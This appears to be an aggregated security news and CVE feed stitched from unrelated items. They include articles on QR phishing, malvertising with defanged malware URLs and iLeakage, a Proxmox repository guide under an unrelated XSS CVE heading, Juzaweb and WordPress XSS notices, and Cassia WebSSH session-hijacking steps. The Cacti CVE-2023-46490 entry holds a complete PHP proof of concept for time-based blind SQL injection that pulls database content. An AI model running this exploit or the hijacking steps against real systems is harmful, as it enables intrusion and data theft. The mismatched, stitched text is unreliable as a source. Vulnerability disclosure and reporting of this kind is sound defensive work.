By Deeba Ahmed
Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive…
This is a post from HackRead.com Read the original post: Surge in QR Code Quishing: Check Point Records 587% Attack Spike

Explore insights into the rise of Quishing attacks, the risks associated with QR code exploitation, and crucial preventive measures to protect against this growing cybersecurity threat.

Check Point’s Harmony Email team has reported a startling increase of 587% in QR code phishing or Quishing attacks. This shocking rise was observed between August and September 2023. Researchers noted thousands of QR code-related attacks each month.

 In the company’s blog post, authored by Check Point’s cybersecurity researcher/analyst Jeremy Fuchs, explained that hackers lure users with QR codes, redirecting them to credential-harvesting websites. In the UK and Europe, around 86.66% of smartphone users have scanned one QR code at least in their lifetime, and 36.40% scanned a code at least once a week.

It isn’t surprising though because in October, Hackread.com reported the findings of SaaS-base cloud messaging security firm SlashNext, according to which a sudden spike was witnessed in QR code-based phishing attacks.

QR codes are easier to exploit because these encode complex data and a compromised code can quickly redirect users to malicious websites. SlashNext researchers noted that attackers prefer two prominent attack methods to exploit QR codes: Quishing and QRLJacking. Now, Check Point has reported that a massive rise in Quishign attacks has been noticed.

Quishing is a type of phishing attack. Unsuspecting users are tricked into accessing malicious websites or downloading malware after scanning a QR code. There are several reasons why Quishing attacks are on the rise, such as their widespread nature, as millions use them to make payments, scan menus, and access information, which makes them an attractive target for threat actors.

Moreover, QR codes can be exploited to hide malicious links, which can lead users to any website the attacker wants them to without alerting them about suspicious activity. 

Harmony Email’s team found that lately, attackers are redirecting users to credential-harvesting sites through QR code lures using social engineering to target end-users with emails that can look like this:

Image credit: Check Point

The lure used in the email is that Microsoft multi-factor authentication is expiring, and the users must re-authenticate. It is worth noting that the email’s body content claims to be sent by Microsoft, but the sender’s address is different.

To combat Quishing, you must add the OCR (Optical Character Recognition) feature in security solutions to detect malicious QR codes. OCR can help you translate the codes into the URL behind the code, and then you can run the URL through a URL analysis tool. However, suspicion should be raised right when you observe that a QR code is present in the email message body.

Since Quishing attacks are becoming a solid threat, it is essential to exercise caution. Never scan without checking the sender’s source, and avoid scanning codes provided with emails unless you have verified the sender. Security professionals must implement email security that leverages OCR for all attacks. They must implement AL, ML, and NLP-based security to understand the real intentions of a message.

****_RELATED ARTICLES_****

1.  Barcode Reader Apps on Play Store Infected with Adware
2.  Stream-Jacking: Malicious YouTube Livestreams Aid Malware
3.  How to make a QR code to accept Bitcoin while keeping it secure
4.  “Picture in Picture” Technique Exploited in Deceptive Phishing Attack
5.  Fake ROBLOX and Nintendo game cracks drop ChromeLoader malware

Surge in QR Code Quishing: Check Point Records 587% Attack Spike

Categories: Threat Intelligence
Tags: malvertising

Tags: ads

Tags: google

Tags: dynamic search ads

Tags: python

Tags: pycharm

Tags: malware

Dynamically generated ads can be problematic when the content they are created from has been compromised.



(Read more...)




The post 'Accidental' malvertising via Dynamic Search Ads delivers malware frenzy appeared first on Malwarebytes Labs.

Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating one. Today, we look at a different scenario where, as strange as that may sound, malvertising was entirely accidental.

The reason this happened was due to the combination of two separate factors: a compromised website and Google Dynamic Search Ads.

Unbeknownst to the site owner, one of their ads was automatically created to promote a popular program for Python developers, and visible to people doing a Google search for it. Victims who clicked on the ad were taken to a hacked webpage with a link to download the application, which turned out to install over a dozen different pieces of malware instead.

**Compromised website promotes software crack**

While we identified the compromised ad before the website, we will first describe what happens from the point of view of the site owner to better understand what led to the ad creation in the first place.

This website is for a business that specializes in wedding planning and their portfolio includes testimonials from previous customers sharing their story and experience. Unfortunately, some of those pages have been injected with malware that spams malicious content into them.

In particular, it changes the page's title and creates an overlay that promotes a serial key for various software programs. For example, the screenshot below shows that overlay advertising a license key for Pycharm, a popular program used by software developers:

**Malvertising via Dynamic Search Ad**

Dynamic Search Ads (DSA) are a type of Google ads that use the content of a website to automate the creation of ads. While this feature is very handy for advertisers, it also comes with the unlikely but potential for abuse. Indeed, if someone is able to modify the website's content without the owner's knowledge, automated ads may be entirely misleading.

Circling back to where our investigation started, this is what we first saw when doing a Google search for 'pycharm'. The ad's headline is showing "JetBrains PyCharm Professional" while the content snippet has gathered a bunch of keywords related to the wedding business. Obviously, there is a discrepancy here between what the ad's title promotes (a program for developers) and the ad's description (wedding planning).

What happened here is Google Ads dynamically generated this ad from the hacked page, which makes the website owner an unintentional intermediary and victim paying for their own malicious ad.

**Fake serial leads to malware bonanza**

People searching for PyCharm may not take the time to read the ad's description, but instead will simply click on the headline. From there, they will be redirected to the compromised page showing the overlay with the link to download the serial key. While not everyone will proceed at this point, those who do will have an experience they aren't likely to forget:

Running this installer will result in a deluge of malware infections the like we have only seen on rare occasions, rendering the computer completely unusable:

Sometimes, an unexperienced criminal may want to monetize as many software loads as possible in order to earn a commission on each. Clearly this is not an elegant attack as the victim will be aware their computer has been loaded with unwanted programs.

Whatever the case may be, downloading cracks or serial keys is akin to walking across a mine field, and you typically only do it once.

**Summary**

This incident is not your typical malvertising case and in fact, it's unlikely that whoever hacked that website was even aware of this happening. Compromised sites can be monetized in many different ways and usually threat actors expect traffic to come from organic search results, not ads.

From an ad quality point of view, this would be difficult to detect in the sense that the ad has been paid for by a legitimate business and takes users to the correct destination. There is no malicious redirect to a fake domain that attempts to deceive users like we have seen before.

Google may be able to detect that the website has been compromised because it contains spam injections. If that is the case, Dynamic Search Ads may inadvertently promote malicious content.

We recommend users to practice safe browsing and always be cautious with sponsored content. Downloading cracked software has never been a good idea, but if you do, always make sure it is clean before you run it.

We have informed the wedding planner business that their website is currently compromised and leading to malicious content.

Malwarebytes already detected all the payloads with its anti-malware and heuristic engines:

**Indicators of Compromise**

Download URL for fake serial:

eplangocview\[.\]com/wp-download/File.7z

Subsequent malware download URLs:

roberthamilton\[.\]top/timeSync\[.\]exe  
109\[.\]107\[.\]182\[.\]2/race/bus50\[.\]exe  
171\[.\]22\[.\]28\[.\]226/download/Services\[.\]exe  
experiment\[.\]pw/setup294\[.\]exe  
medfioytrkdkcodlskeej\[.\]net/987123\[.\]exe  
171\[.\]22\[.\]28\[.\]226/download/WWW14\_64\[.\]exe  
185\[.\]172\[.\]128\[.\]69/newumma\[.\]exe  
194\[.\]169\[.\]175\[.\]233/setup\[.\]exe  
171\[.\]22\[.\]28\[.\]221/files/Ads\[.\]exe  
171\[.\]22\[.\]28\[.\]213/3\[.\]exe  
lakuiksong\[.\]known\[.\]co\[.\]ke/netTimer\[.\]exe  
stim\[.\]graspalace\[.\]com/order/tuc19\[.\]exe  
neuralshit\[.\]net/1298d7c8d865df39937f1b0eb46c0e3f/7725eaa6592c80f8124e769b4e8a07f7\[.\]exe  
pic\[.\]himanfast\[.\]com/order/tuc15\[.\]exe  
85\[.\]217\[.\]144\[.\]143/files/My2\[.\]exe  
galandskiyher5\[.\]com/downloads/toolspub1\[.\]exe  
gobr1on\[.\]top/build\[.\]exe  
flyawayaero\[.\]net/baf14778c246e15550645e30ba78ce1c\[.\]exe  
632432\[.\]space/385118/setup\[.\]exe  
yip\[.\]su/RNWPd\[.\]exe  
potatogoose\[.\]com/1298d7c8d865df39937f1b0eb46c0e3f/baf14778c246e15550645e30ba78ce1c\[.\]exe  
185\[.\]216\[.\]71\[.\]26/download/k/KL\[.\]exe  
walkinglate\[.\]com/watchdog/watchdog\[.\]exe  
walkinglate\[.\]com/uninstall\[.\]exe

'Accidental' malvertising via Dynamic Search Ads delivers malware frenzy

By Deeba Ahmed
What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. 
This is a post from HackRead.com Read the original post: iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

A team of researchers comprising Georgia Tech’s cybersecurity professors, Daniel Genkin and Jason Kim, University of Michigan’s Stephan van Schaik, and Ruhr University Bochum’s Yuval Yarom have published a research paper explaining a vulnerability they discovered in Apple devices that affects Macs and iPhones.

Researchers explained in the paper titled “iLeakage: Browser-based Timerless Speculative Execution Attacks on Apple Devices,” that the vulnerability, dubbed iLeakage, has been affecting Macs and iPhones since 2020. The attack mainly affects those devices that were built with Apple’s Arm-based A-series and M-series chips.

Researchers devised an attack that forced Apple’s Safari browser to divulge passwords, Gmail content, and other sensitive data by exploiting a side channel vulnerability in the CPUs. 

This vulnerability is built off an existing attack technique used on CPUs for over six years. Back in 2018, security researchers reported that all modern CPUs can be exploited to leak sensitive data by exploiting an integral feature on the processor called Speculative Execution. 

In this technique, modern CPUs try to improve performance by executing instructions before they know it is needed. iLeakage is a browser-based attack exploiting a timerless speculative execution flaw in Apple devices. Timerless speculative execution lets the CPU execute instructions even without any time running. The attackers can exploit this to perform malicious operations without getting detected.

What happens in iLeakage attacks is that the CPU is tricked into executing speculative code that reads sensitive data from memory. The attacker can exfiltrate this data without alerting the user. It is a dangerous attack because adversaries can perform them without needing the victim to click on malicious links or open infected documents/attachments.

The flaw exists in the way the Safari browser handles JavaScript timers. This allows attackers to create malicious JavaScript code and use it to steal sensitive data from the device. The stolen data may include passwords, PII (personal identification information), and credit card numbers. Using this data, attackers can commit crimes like identity theft and fraud.

Researchers noted that iLeakage attacks are currently effective on Apple devices running Safari. However, other platforms or browsers may also be vulnerable. Therefore, it is essential to exercise caution to prevent iLeakage attacks. Always keep your software up-to-date and use a security solution that can detect/block speculative execution attacks.

The findings were disclosed to Apple on 12 September 2022. The company acknowledged this issue, and Apple’s Product Security team and Safari browser development team collaborated with the researchers to develop countermeasures. As a result, Apple refactored Safari’s multi-process architecture. These changes are currently under active development and are available in Safari Technology Preview versions 173 and above.

Apple has released a new inter-process communication API to spawn new processes for pages launched with window.open(). Researchers have confirmed that the patch mitigates iLeakage attacks by preventing the consolidation of domains across security boundaries but it has limitations.

“We have empirically verified that this patch mitigates our attack by preventing the consolidation of domains across security boundaries. This means that while it is still possible to escape the speculative JavaScript sandbox, an attacker will only be able to read their own address space and therefore their own data,” researchers concluded.

The full report can be accessed here (PDF), and there is a dedicated site available to demonstrate the iLeakage attack.

Regarding this research, Lionel Litty, Chief Security Architect at Menlo Security, a Mountain View, Calif.-based provider of browser security stated that this attack shows browsers are the new OS. 

“This attack illustrates how for both attackers and defenders, the browser is the new OS, with web primitives such as origins and web workers that parallel OS primitives, such as applications and threads. Security practitioners must educate themselves on this attack surface.”

John Gallagher, Vice President of Viakoo Labs at Viakoo, a Mountain View, Calif.-based provider of automated IoT cyber hygiene noted that this attack method is not as significant as is the realization that threats are continually evolving. 

“The significance is not necessarily in this as an attack method, but more in how threats are evolving based on the tradeoff between speed and security. Prefetching of information to speed up CPU execution has been around for a while, and equally has been exploited for a while.  This is just a further “tit for tat”, and will be remediated in future CPU development.”

Gallagher, however, claims that in this attack, organizations aren’t at high risk because this attack requires a high degree of sophistication and there aren’t any reports that it has been exploited in the wild. 

“Organizations are not at high risk, given that this attack method requires a high degree of sophistication by the threat actor and has not been seen exploited yet in the wild (or at least not reported).  Organizations concerned (or high-value individual targets) should consider enabling lockdown mode, or using the MacOS (unstable) patch available,” Gallagher stated.

1.  According to Chrome, Safari and FireFox ThePirateBay is a Phishing Site
2.  Hackers Pwned Apple Safari in 20 seconds; Google Pixel in 60 seconds
3.  Bug in Safari browser leaks personal identifiers and browsing activity
4.  Apple Safari Safest, Google Chrome Riskiest Browser of 2022- Study

iLeakage Attack: Theft of Sensitive Data from Apple’s Safari Browser

Proxmox proxmox-widget-toolkit before 4.0.9, as used in multiple Proxmox products, allows XSS via the edit notes feature.

From Proxmox VE

Jump to navigation Jump to search

Proxmox VE uses APT as its package management tool like any other Debian-based system.

**Repositories in Proxmox VE**

Repositories are a collection of software packages, they can be used to install new software, but are also important to get new updates.

You need valid Debian and Proxmox repositories to get the latest security updates, bug fixes and new features.

APT Repositories are defined in the file /etc/apt/sources.list and in .list files placed in /etc/apt/sources.list.d/.

**Repository Management**

Since Proxmox VE 7, you can check the repository state in the web interface. The node summary panel shows a high level status overview, while the separate _Repository_ panel shows in-depth status and list of all configured repositories.

Basic repository management, for example, activating or deactivating a repository, is also supported.

**Sources.list**

In a sources.list file, each line defines a package repository. The preferred source must come first. Empty lines are ignored. A # character anywhere on a line marks the remainder of that line as a comment. The available packages from a repository are acquired by running apt-get update. Updates can be installed directly using apt-get, or via the GUI (Node → Updates).

File

/etc/apt/sources.list

deb http://deb.debian.org/debian bookworm main contrib
deb http://deb.debian.org/debian bookworm-updates main contrib

# security updates
deb http://security.debian.org/debian-security bookworm-security main contrib

Proxmox VE provides three different package repositories.

**Proxmox VE Enterprise Repository**

This is the default, stable, and recommended repository, available for all Proxmox VE subscription users. It contains the most stable packages and is suitable for production use. The pve-enterprise repository is enabled by default:

File

/etc/apt/sources.list.d/pve-enterprise.list

deb https://enterprise.proxmox.com/debian/pve bookworm pve-enterprise

The root@pam user is notified via email about available updates. Click the _Changelog_ button in the GUI to see more details about the selected update.

You need a valid subscription key to access the pve-enterprise repository. Different support levels are available. Further details can be found at https://www.proxmox.com/en/proxmox-ve/pricing.

You can disable this repository by commenting out the above line using a # (at the start of the line). This prevents error messages if your host does not have a subscription key. Please configure the pve-no-subscription repository in that case.

**Proxmox VE No-Subscription Repository**

This is the recommended repository for testing and non-production use. Its packages are not as heavily tested and validated. You don’t need a subscription key to access the pve-no-subscription repository.

We recommend to configure this repository in /etc/apt/sources.list.

File

/etc/apt/sources.list

deb http://ftp.debian.org/debian bookworm main contrib
deb http://ftp.debian.org/debian bookworm-updates main contrib

# Proxmox VE pve-no-subscription repository provided by proxmox.com,
# NOT recommended for production use
deb http://download.proxmox.com/debian/pve bookworm pve-no-subscription

# security updates
deb http://security.debian.org/debian-security bookworm-security main contrib

**Proxmox VE Test Repository**

This repository contains the latest packages and is primarily used by developers to test new features. To configure it, add the following line to /etc/apt/sources.list:

sources.list entry for

pvetest

deb http://download.proxmox.com/debian/pve bookworm pvetest

The pvetest repository should (as the name implies) only be used for testing new features or bug fixes.

**Ceph Quincy Enterprise Repository**

This repository holds the enterprise Proxmox VE Ceph Quincy packages. They are suitable for production. Use this repository if you run the Ceph client or a full Ceph cluster on Proxmox VE.

File

/etc/apt/sources.list.d/ceph.list

deb https://enterprise.proxmox.com/debian/ceph-quincy bookworm enterprise

**Ceph Quincy No-Subscription Repository**

This Ceph repository contains the Ceph Quincy packages before they are moved to the enterprise repository and after they where on the test repository.

It’s recommended to use the enterprise repository for production machines.

File

/etc/apt/sources.list.d/ceph.list

deb http://download.proxmox.com/debian/ceph-quincy bookworm no-subscription

**Ceph Quincy Test Repository**

This Ceph repository contains the Ceph Quincy packages before they are moved to the main repository. It is used to test new Ceph releases on Proxmox VE.

File

/etc/apt/sources.list.d/ceph.list

deb http://download.proxmox.com/debian/ceph-quincy bookworm test

**Older Ceph Repositories**

Proxmox VE 8 doesn’t support Ceph Pacific, Ceph Octopus, or even older releases for hyper-converged setups. For those releases, you need to first upgrade Ceph to a newer release before upgrading to Proxmox VE 8.

**SecureApt**

The _Release_ files in the repositories are signed with GnuPG. APT is using these signatures to verify that all packages are from a trusted source.

If you install Proxmox VE from an official ISO image, the key for verification is already installed.

If you install Proxmox VE on top of Debian, download and install the key with the following commands:

 # wget https://enterprise.proxmox.com/debian/proxmox-release-bookworm.gpg -O /etc/apt/trusted.gpg.d/proxmox-release-bookworm.gpg

Verify the checksum afterwards with the sha512sum CLI tool:

\# sha512sum /etc/apt/trusted.gpg.d/proxmox-release-bookworm.gpg
7da6fe34168adc6e479327ba517796d4702fa2f8b4f0a9833f5ea6e6b48f6507a6da403a274fe201595edc86a84463d50383d07f64bdde2e3658108db7d6dc87 /etc/apt/trusted.gpg.d/proxmox-release-bookworm.gpg

or the md5sum CLI tool:

\# md5sum /etc/apt/trusted.gpg.d/proxmox-release-bookworm.gpg
41558dc019ef90bd0f6067644a51cf5b /etc/apt/trusted.gpg.d/proxmox-release-bookworm.gpg

**Proxmox VE 7.x Repositories**

Proxmox VE 7.x is based on Debian 11.x (“bullseye”). Please note that this release is out of date (see the FAQ support table). Existing installations should be updated. Nevertheless access to these repositories is still provided.

 

Repository

sources.list entry

Proxmox VE 7.x Enterprise

deb https://enterprise.proxmox.com/debian/pve bullseye pve-enterprise

Proxmox VE 7.x No-Subscription

deb http://download.proxmox.com/debian/pve bullseye pve-no-subscription

Proxmox VE 7.x Test

deb http://download.proxmox.com/debian/pve bullseye pvetest

Release key hash sums:

sha512sum /etc/apt/trusted.gpg.d/proxmox-release-bullseye.gpg
7fb03ec8a1675723d2853b84aa4fdb49a46a3bb72b9951361488bfd19b29aab0a789a4f8c7406e71a69aabbc727c936d3549731c4659ffa1a08f44db8fdcebfa

md5sum /etc/apt/trusted.gpg.d/proxmox-release-bullseye.gpg
bcc35c7173e0845c0d6ad6470b70f50e

**Outdated: stable Repository pve**

This repository is a leftover to ease the update to 3.1. It will not get any updates after the release of 3.1. Therefore the repository needs to be removed after the upgrade to 3.1.

File

/etc/apt/sources.list

deb http://ftp.debian.org/debian wheezy main contrib

# PVE packages provided by proxmox.com - NO UPDATES after the initial release of 3.1
# deb http://download.proxmox.com/debian wheezy pve

# security updates
deb http://security.debian.org/ wheezy/updates main contrib

**Outdated: Proxmox VE 2.x Repositories**

Proxmox VE 2.x is based on Debian 6.0 (“squeeze”) and outdated. Please upgrade to the latest version as soon as possible. In order to use the stable pve 2.x repository, check your sources.list:

File

/etc/apt/sources.list

deb http://ftp.debian.org/debian squeeze main contrib

# PVE packages provided by proxmox.com
deb http://download.proxmox.com/debian squeeze pve

# security updates
deb http://security.debian.org/ squeeze/updates main contrib

**Outdated: Proxmox VE VE 1.x Repositories**

Proxmox VE 1.x is based on Debian 5.0 (“lenny”) and very outdated. Please upgrade to latest version as soon as possible.

CVE-2023-46854: Package Repositories - Proxmox VE

Cross Site Scripting vulnerability in juzawebCMS v.3.4 and before allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter of the registration page.

首页 › web安全 › \[CVE-2023-46467\] There's an Stored XSS vulnerability in Juzaweb CMS

2023-10-19 15:22

56 0

**CVE ID**

CVE-2023-46467

**GitHub**

https://github.com/juzaweb/cms

**Influenced Version**

<= v3.4

**Vulnerability Type**

Cross Site Scripting(XSS)

**Description**

Cross Site Scripting vulnerability in juzawebCMS v.3.4 and before allows a remote attacker to execute arbitrary code via a crafted payload to the username parameter of the registration page.

http://ip/register:

http://ip/admin-cp:

相关文章

评论 (暂无评论)

**发表评论**

Sumor 菜到不能肤吸。

36文章 10评论 2栏目

热门文章

kali内网攻击-mitmf

2 评论

msfvenom后门生成与利用

1 评论

CVE-2019-9762 SQL注入

1 评论

黑客丛林之旅通关攻略

1 评论

记一次PhotoGrapher靶机渗透

1 评论

更多

CVE-2023-46467: [CVE-2023-46467] There's an Stored XSS vulnerability in Juzaweb CMS

An issue in juzawebCMS v.3.4 and before allows a remote attacker to execute arbitrary code via a crafted file to the custom plugin function.

**CVE ID**

CVE-2023-46468

**GitHub**

https://github.com/juzaweb/cms

**Influenced Version**

<= v3.4

**Vulnerability Type**

Eval injection

**Description**

An issue in juzawebCMS v.3.4 and before allows a remote attacker to execute arbitrary code via a crafted file to the custom plugin function.

POC: https://sumor.top/usr/uploads/2023/10/poc.zip

1.Insert malicious PHP code into custom plugins：

2.Upload custom plugins：

3.Enable plugins:

4.Refresh the page to trigger the vulnerability:

CVE-2023-46468: [CVE-2023-46468] There's an RCE vulnerability in Juzaweb CMS

SQL Injection vulnerability in Cacti v1.2.25 allows a remote attacker to obtain sensitive information via the form_actions() function in the managers.php function.

Package cacti Affected versions <=1.2.25 Patched versions None Summary A SQL Injection vulnerability discovered in managers.php allowed authenticated users to access database information. Details SQL Injection vulnerability discovered in managers.php. In function form\_actions(), request\_var 'selected\_items' is joined into into SQL statements without security checks. source code: function form\_actions() { global $manager\_actions, $manager\_notification\_actions; if (isset\_request\_var('selected\_items')) { if (isset\_request\_var('action\_receivers')) { $selected\_items = cacti\_unserialize(stripslashes(get\_nfilter\_request\_var('selected\_graphs\_array'))); if ($selected\_items != false) { if (get\_nfilter\_request\_var('drp\_action') == '1') { // delete db\_execute('DELETE FROM snmpagent\_managers WHERE id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_managers\_notifications WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); db\_execute('DELETE FROM snmpagent\_notifications\_log WHERE manager\_id IN (' . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '2') { // enable db\_execute("UPDATE snmpagent\_managers SET disabled = '' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } elseif (get\_nfilter\_request\_var('drp\_action') == '3') { // disable db\_execute("UPDATE snmpagent\_managers SET disabled = 'on' WHERE id IN (" . implode(',' ,$selected\_items) . ')'); } header('Location: managers.php?header=false'); exit; } PoC $url = \["http://localhost/cacti/", "http://192.168.80.128/cacti/",\]; $url = $url\[1\]; $username = 'admin'; $password = 'password'; $login = "index.php?action=login&login\_username=$username&login\_password=$password"; $injectSQLcode1=serialize(\["1 ) or if ('admin' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $injectSQLcode2=serialize(\["1 ) or if ('error' = (SELECT username FROM user\_auth WHERE id = 1 ), sleep(5), 0"\]); $target = "managers.php?action=actions&selected\_items=1&action\_receivers=1&drp\_action=1&selected\_graphs\_array="; function curlPage($url, $cookie=false){ $curl = curl\_init(); curl\_setopt($curl, CURLOPT\_URL, $url); curl\_setopt($curl, CURLOPT\_HEADER, 1); curl\_setopt($curl, CURLOPT\_RETURNTRANSFER, 1); curl\_setopt($curl, CURLOPT\_CONNECTTIMEOUT, 60); curl\_setopt($curl, CURLOPT\_TIMEOUT, 60); if($cookie){ curl\_setopt($curl, CURLOPT\_COOKIE,$cookie); } $data = curl\_exec($curl); echo "\[++Debug++\] ".$url."\\n"; curl\_close($curl); return $data; } function getSQLinjectionPage(){ global $url, $login, $target, $injectSQLcode1, $injectSQLcode2; //login $data1 = curlPage($url.$login); //echo $data1."\\n"; //get cookie $cookie = substr($data1, strpos($data1, 'Set-Cookie: ') + 12, 32); echo '\[++Debug++\] Cacti Cookie: '.$cookie."\\n"; //check login $data2 = curlPage($url."index.php", $cookie); //echo substr($data2, 0, 300)."\\n\\n"; //time of correct test $time1 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode1), $cookie); $time1 = time() - $time1; echo "\[++result++\] time of correct test: ".$time1."\\n\\n"; //time of error test $time2 = time(); $data3 = curlPage($url.$target.urlencode($injectSQLcode2), $cookie); $time2 = time() - $time2; echo "\[++result++\] time of error test: ".$time2."\\n\\n"; if( $time2 <=1 and $time1 >= 5){ echo "\[++result++\] Time difference exist, vulnerability exsit!"."\\n\\n"; }else{ echo "\[++result++\] No time difference, vulnerability not exsit"."\\n\\n"; } } //set ip, port, username, password, InjectCode first getSQLinjectionPage(); Impact Although there is no echo，by measuring the time delay of accessing the website, authenticated users can obtain mysql database content.

CVE-2023-46490: CVE-2023-46490

CrowdStrike is moving deeper into application security with its agreement to acquire Bionic, provider of ASPM technology that proactively scans software in production for vulnerabilities.

CrowdStrike’s acquisition of Bionic last month is an example of how the company is strengthening its cloud security offerings.

Omdia senior principal analyst Rik Turner believes Bionic will lift CrowdStrike, best known as a leading extended detection and response (XDR), into a significant player in reactive cloud security. "This deal not only takes CrowdStrike into the world of AppSec but also the proactive side of the security market," Turner wrote in a research note.

The acquisition brings Cloud Native Application Protection Platform (CNAPP) and Application Security Posture Management (ASPM) capabilities to CrowdStrike’s Falcon platform. The company plans to combine the Falcon Horizon Cloud Security Posture Management (CSPM) and Falcon Cloud Workload Protection (CWP) modules with Bionic’s technology into a unified dashboard to allow DevOps teams the ability to prioritize cloud security incidents, mitigate runtime threats and provide threat hunting, the company said. Bionic said its ASPM features proactively discovers security, data privacy, and operational risks by continuously scanning and analyzing an organization’s application architecture and software dependencies to uncover any anomalies. Notably, it provides views into the security posture of applications in production.

At CrowdStrike’s Fal.Con user event last month, CrowdStrike president Mike Sentonas demonstrated how Bionic can expand CrowdStrike’s cloud security portfolio to include cloud infrastructure entitlement management (CIEM) capabilities. Bionic can provide visibility into Amazon Web Services and Microsoft Azure applications and the third-party services they communicate with, Sentonas said.

Developers update microservices and serverless functions daily through their CI/CD pipelines. Sentonas showed how Bionic mapped 102 application services, presented their dependencies, and identified how they communicate with each other. “You can drill into each cloud and see what business applications are running,” he said.

Proactive security consists of tools that can identify and remediate vulnerabilities, excessive access permissions and misconfigurations before threat actors discover and exploit them, according to Omdia’s Turner. “It is an approach that complements rather than replaces reactive security, effectively reducing the attack surface that reactive platforms such as XDR and the SIEM/SOAR continuum must address,” Turner said.

Many CrowdStrike customers attending the Fal.Con were familiar with Bionic, and some say they intend to evaluate it, such as Prabhath Karanth, global head of security and Trust at Navan (formerly TripAdvisor). "I’ve looked at Bionic in the past, and they have really good runtime application security technology in the context of the infrastructure," Karanth says.

"It sounds like they want to approach the problem from a runtime perspective and address the problem of running your applications and containers and all of that in production," Karanth says. "Because in a distributed microservices architecture, where your application is sitting in a containerized environment, this container runtime security becomes critical. I’d like to know more. It was just announced. But I think it’s a very strategic acquisition."

Bionic gives organizations a comprehensive view of the risk associated with everything that’s running in the cloud — the applications, the microservices, and everything that’s connected to it — which really represents risk, CrowdStrike founder and CEO George Kurtz said during the opening keynote at the Fal.Con event last month.

"The beauty and the magic of this technology is that you don’t need source code, or you don’t have to plug in the libraries," Kurtz said.

What the Bionic Acquisition Can Bring to CrowdStrike

An issue was discovered in Cassia Access Controller 2.1.1.2303271039. The Web SSH terminal endpoint (spawned console) can be accessed without authentication. Specifically, there is no session cookie validation on the Access Controller; instead, there is only Basic Authentication to the SSH console.

**CVE-2023-35794-WebSSH-Hijacking**

Repository contains description for CVE-2023-35794 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.

CVE ID: CVE-2023-35794  
Vendor: Cassia Networks  
Product: Access Controller  
Version: Cassia-AC-2.1.1.2303271039

Vulnerability: Incorrect Access Control  
Affected: web ssh, gateways  
Decription: WebSSH session can be hijacked  
Status: Confirmed by vendor, Fixed  
Version Patched: Cassia-AC-2.1.1.2308181707

**Details**

Cassia uses WebSSH2 by billchurch to initiate SSH sessions from AC to Gateways. WebSSH2 Is a web SSH Client which uses ssh2, socket.io, xterm.js, and express. A bare bones example of an HTML5 web-based terminal emulator and SSH client. It uses SSH2 as a client on a host to proxy a Websocket/Socket.io connection to a SSH2 server.

When a session of WebSSH is established with Gateway Device any external user can hijack it without any authentication and authorization.

Session establishment is done via GET request to proper /ap/remote/<mac>?ssh_port=<ac-rev-ssh-port> Gateway then receiving request through MQTT (or CAPWAP) channel and establishes SSH tunnel with local port forwarding to Access Controller. Then Access-Controller binds to the forwarded port with SSH Web Session. The user who invoked the web ssh session is redirected to /ssh/host but the session cookie is not validated. The new WebSSH2 cookie is provided with 401 error.  In fact a user is being asked for providing Basic auth.  Obtained Basic authentication credentials are sent in next requests and potentially consumed by webssh2.bundle.js as credentials used to authenticate to the choosen device.   This allows unathorized to Access Controller portal User to hijack already existing SSH session with only knowing SSH username and password (note that this commonly may be default cassia:cassia-<last-mac-6-digits>).

**Exploitation**

An attacker may use CVE-2023-35793 to trick any athenticated user to initiate a session to any device connected to the AC (note that the user does not need to login into the gateway, the session itself will be initiated with only exploiting CVE-2023-35793 CSRF). Then using this vulnerability and knowing the MAC address an attacker may easily obtain access to the device through WebSSH.

Lets assume an attacker triggered someone and the session is established to the gateway where the default credentials are used.

1.  Attacker just opens the web browser and enters default credentials for known device. 
2.  Attacker knowing which device were triggered provides default credentials (commonly these are not being changed) 
3.  Attacker is authenticated to device LXC container as a user which has root rights by default 

**Remediation**

*   Patch to the highest possible version availaible on Cassia Networks

CVE-2023-35794: GitHub - Dodge-MPTC/CVE-2023-35794-WebSSH-Hijacking: Repository contains description for CVE-2023-35794 discovered by Dodge Industrial Team for Dodge OPTIFY platfrom.

Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Alkaweb Eonet Manual User Approve plugin <= 2.1.3 versions.

**Solution**

 No fix

No patched version is available.

Emili Castells discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress Eonet Manual User Approve Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#web